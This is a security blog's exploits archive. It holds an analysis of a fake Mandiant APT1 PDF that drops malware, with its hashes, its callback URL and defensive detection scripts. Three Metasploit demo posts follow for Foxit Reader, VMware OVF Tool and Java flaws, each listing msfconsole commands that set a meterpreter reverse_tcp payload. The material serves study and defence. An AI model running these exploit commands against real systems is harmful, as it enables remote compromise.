Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

Exploitation Demo of Fake Mandiant APT1 Report PDF

As reported by Symantec and Seculert, a spear-phishing campaign has used a fake copy of the Mandiant APT1 report (APT1: Exposing One of China’s Cyber Espionage Units), which Mandiant published earlier this week. The fake PDF was used in targeted attacks against Japanese entities and exploits the Adobe Acrobat and Reader remote code execution vulnerability CVE-2013-0641.

Despite Symantec’s analysis, I can confirm that the PDF drops malware onto the computer.

The PDF file name is “Mandiant.pdf”, MD5 2a42bf17393c3caaa663a6d1dade9c93 (23/46 detections on VirusTotal). Once opened, an error message is displayed.

[Screenshot: pdf-error-message]

After the error message is dismissed, the vulnerability is exploited and “AdobeARM.exe” (MD5 41915b34fc50ffdd2a6a0969e3f55ff1) is dropped into the “C:\Documents and Settings\<USER>\Local Settings\Temp” folder. The file name mimics Adobe’s legitimate updater (Adobe Reader and Acrobat Manager). The executable’s resource language is Chinese (Simplified).

[Screenshot: AdobeARM-properties]

“AdobeARM.exe” connects to the domain “www.shounkaku.co.jp”, a legitimate website, and requests the path “/space/fsjd-ge3234c4d61033.gif”. The file no longer exists on the server.
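As an added example (not code from the original post), the following Python hunts for this callback in proxy access logs. The log lines are constructed for the example in Squid’s native access.log layout; only the host and path come from the analysis above. Matching on the full URL rather than the domain matters here because the host is a legitimate site, and a 404 still counts: the dropper beacons to that path whether or not the GIF is still there.

```python
"""Hunt for the AdobeARM.exe callback in proxy logs.

Added example, not code from the original post. The log lines below are
constructed in Squid's native access.log layout; only the host and path
come from the analysis of the sample.
"""
import re
from urllib.parse import urlsplit

# Indicators from the AdobeARM.exe analysis.
C2_HOST = "www.shounkaku.co.jp"             # legitimate site abused for hosting
C2_PATH = "/space/fsjd-ge3234c4d61033.gif"  # payload path, since removed

# Squid native format: <ts> <elapsed> <client> <result/status> <bytes> <method> <url> ...
SQUID_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+(?P<result>\S+)\s+\d+\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)"
)

# Constructed sample log: one normal visit to the legitimate site, one
# infected host fetching the (already removed) payload, one unrelated request.
SAMPLE_LOG = """\
1361980000.123    245 10.0.0.15 TCP_MISS/200 5120 GET http://www.shounkaku.co.jp/ - HIER_DIRECT/203.0.113.10 text/html
1361980012.456     98 10.0.0.23 TCP_MISS/404 412 GET http://www.shounkaku.co.jp/space/fsjd-ge3234c4d61033.gif - HIER_DIRECT/203.0.113.10 text/html
1361980020.789     31 10.0.0.23 TCP_MISS/200 1021 GET http://example.net/index.html - HIER_DIRECT/198.51.100.5 text/html
"""


def classify(line: str):
    """Return (client, verdict, http_status) for requests to the abused
    host, or None for anything else.

    verdict is "callback" when the full payload URL was requested (the
    dropper beacons there even after the file was removed, so a 404 is
    still evidence of infection) and "host-only" for other requests to the
    same legitimate site, which on their own are not suspicious.
    """
    m = SQUID_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    if (url.hostname or "").lower() != C2_HOST:
        return None
    http_status = m.group("result").split("/")[-1]
    verdict = "callback" if url.path == C2_PATH else "host-only"
    return m.group("client"), verdict, http_status


def hunt(log_text: str):
    """Scan a whole log and return the matching (client, verdict, status) tuples."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


def infected_clients(log_text: str):
    """Clients that requested the exact payload URL, regardless of status code."""
    return sorted({client for client, verdict, _ in hunt(log_text) if verdict == "callback"})


if __name__ == "__main__":
    for client, verdict, status in hunt(SAMPLE_LOG):
        print(f"{client:<12} {verdict:<10} HTTP {status}")
    print("infected:", infected_clients(SAMPLE_LOG))
```

Run against a real access.log by feeding its contents to hunt(); the "host-only" verdicts are there so that ordinary browsing of the legitimate site is not reported as an infection.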

An interesting string in “AdobeARM.exe” is “Hello from MFC!” (Military Force of China?). More prosaically, “Hello from MFC!” is the boilerplate string that the Visual C++ MFC (Microsoft Foundation Classes) application wizard places in a new project, so it most likely only shows that the dropper was built from an MFC template.

[Screenshot: AdobeARM-strings]

Regarding the PDF, the embedded JavaScript appears to be the same as in the original 0-day sample (the function and variable names sHOGG, oTHERWISE and others are reused). So it seems that someone has successfully weaponized the original 0-day.

[Screenshot: pdf-shogg]
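As an added example, not code from the original post, here is a Python triage script for the indicators mentioned above. It hashes a file against the two MD5s given in this post and looks for the JavaScript markers and the sHOGG/oTHERWISE names both in the raw bytes and inside inflated FlateDecode streams, because exploit JavaScript is normally stored compressed and a plain grep of the file misses it. The PDF built in the block is a constructed stand-in, not the real sample; only the names and hashes come from the post.

```python
"""Offline triage of a suspicious PDF for the indicators in this post.

Added example, not code from the original post. The PDF built below is a
constructed stand-in, not the real Mandiant.pdf; only the JavaScript
names and the MD5 hashes come from the analysis.
"""
import hashlib
import re
import zlib

# MD5s reported in the post.
KNOWN_MD5 = {
    "2a42bf17393c3caaa663a6d1dade9c93": "Mandiant.pdf (fake APT1 report)",
    "41915b34fc50ffdd2a6a0969e3f55ff1": "AdobeARM.exe (dropped payload)",
}
# Function/variable names shared with the original CVE-2013-0641 JavaScript.
JS_NAMES = [b"sHOGG", b"oTHERWISE"]
# Generic markers that a PDF carries script at all.
JS_MARKERS = [b"/JavaScript", b"/JS", b"/OpenAction"]

# stream ... endstream bodies; the lookbehind stops "endstream" from
# being taken as the start of a new stream.
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def known_sample(data: bytes):
    """Name of the known sample this file matches by MD5, or None."""
    return KNOWN_MD5.get(md5_hex(data))


def extract_streams(pdf: bytes):
    """Yield stream bodies, inflated when they are zlib/FlateDecode data.

    Other filters (ASCIIHex, LZW, ...), object streams and encrypted
    documents are not handled here; a real triage tool needs them.
    """
    for m in STREAM_RE.finditer(pdf):
        body = m.group(1)
        try:
            yield zlib.decompress(body)
        except zlib.error:
            yield body


def scan_pdf(pdf: bytes) -> dict:
    """Which indicators appear in the raw bytes and which only inside streams."""
    wanted = JS_NAMES + JS_MARKERS
    raw = {w.decode() for w in wanted if w in pdf}
    in_streams = set()
    for body in extract_streams(pdf):
        in_streams.update(w.decode() for w in wanted if w in body)
    return {"raw": sorted(raw), "streams": sorted(in_streams)}


def build_sample_pdf() -> bytes:
    """Constructed stand-in: JavaScript with the reported names, hidden in a
    FlateDecode stream so a plain grep of the file does not see them."""
    js = b"function sHOGG(){} function oTHERWISE(){} app.alert('x');"
    deflated = zlib.compress(js)
    return (
        b"%PDF-1.4\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
        b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
        b"4 0 obj << /Length " + str(len(deflated)).encode()
        + b" /Filter /FlateDecode >>\nstream\n" + deflated + b"\nendstream\nendobj\n"
        b"%%EOF\n"
    )


if __name__ == "__main__":
    sample = build_sample_pdf()
    print("md5:", md5_hex(sample), "known:", known_sample(sample))
    print(scan_pdf(sample))
```

On the constructed file the names show up only in the "streams" result and not in "raw", which is exactly why a hash or string match on the file as stored is not enough to recognise a repacked copy of the same exploit.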

Below is a demonstration video of the exploitation.

Foxit Reader Plugin URL Processing Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by rgod on 2013-01-07
Vendor public release of the vulnerability on 2013-01-14
Metasploit PoC provided on 2013-02-12

PoC provided by :

rgod
Sven Krewitt
juan vazquez

Reference(s) :

OSVDB-89030
BID-57174
Foxit Bulletin

Affected version(s) :

Foxit Reader 5.4.4 and earlier
Foxit PhantomPDF 5.4.2 and earlier

Tested on Windows 7 Ultimate SP1 with :

Firefox 18.0.2
Foxit Reader version 5.4.4.11281

Description :

This module exploits a stack-based buffer overflow in the Foxit Reader browser plugin (npFoxitReaderPlugin.dll). When a PDF is loaded from a remote host, an overly long query string in the URL overflows a stack buffer, which can be exploited to execute arbitrary code. This exploit has been tested on Windows 7 SP1 with Firefox 18.0 and Foxit Reader version 5.4.4.11281 (npFoxitReaderPlugin.dll version 2.2.1.530).

Commands :

use exploit/windows/browser/foxit_reader_plugin_url_bof
set SRVHOST 192.168.178.26
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-3569 VMware OVF Tool Format String Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Jeremy Brown of Microsoft
Coordinated public release of the vulnerability on 2012-11-08
Metasploit PoC provided on 2013-02-04

PoC provided by :

Jeremy Brown
juan vazquez

Reference(s) :

CVE-2012-3569
OSVDB-87117
BID-56468
VMSA-2012-0015

Affected version(s) :

VMware OVF Tool 2.1 and earlier for Windows
VMware Workstation 8.0.5 and earlier for Windows
VMware Player 4.0.4 and earlier for Windows

Tested on Windows XP Pro SP3 with :

VMware OVF Tool 2.1

Description :

This module exploits a format string vulnerability in VMware OVF Tool 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a malformed OVF file: attacker-controlled content from the file ends up being used as the format string. The module has been tested successfully with VMware OVF Tool 2.1 on Windows XP SP3.

Commands :

use exploit/windows/fileformat/ovftool_format_string
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo

Timeline :

Vulnerability patched by Oracle in the October 2012 CPU
Metasploit PoC provided on 2013-01-22

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5088
OSVDB-86352
BID-56057
Oracle October 2012 CPU
New Java Modules in Metasploit… No 0 days this time

Affected version(s) :

Oracle Java version 7 Update 7 and earlier.

Tested on Windows 8 Pro with :

Internet Explorer 10
Oracle Java 7 Update 7

Description :

This module abuses the MethodHandle class from a Java applet to run arbitrary Java code outside the sandbox. The vulnerability affects Java 7 Update 7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_method_handle
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo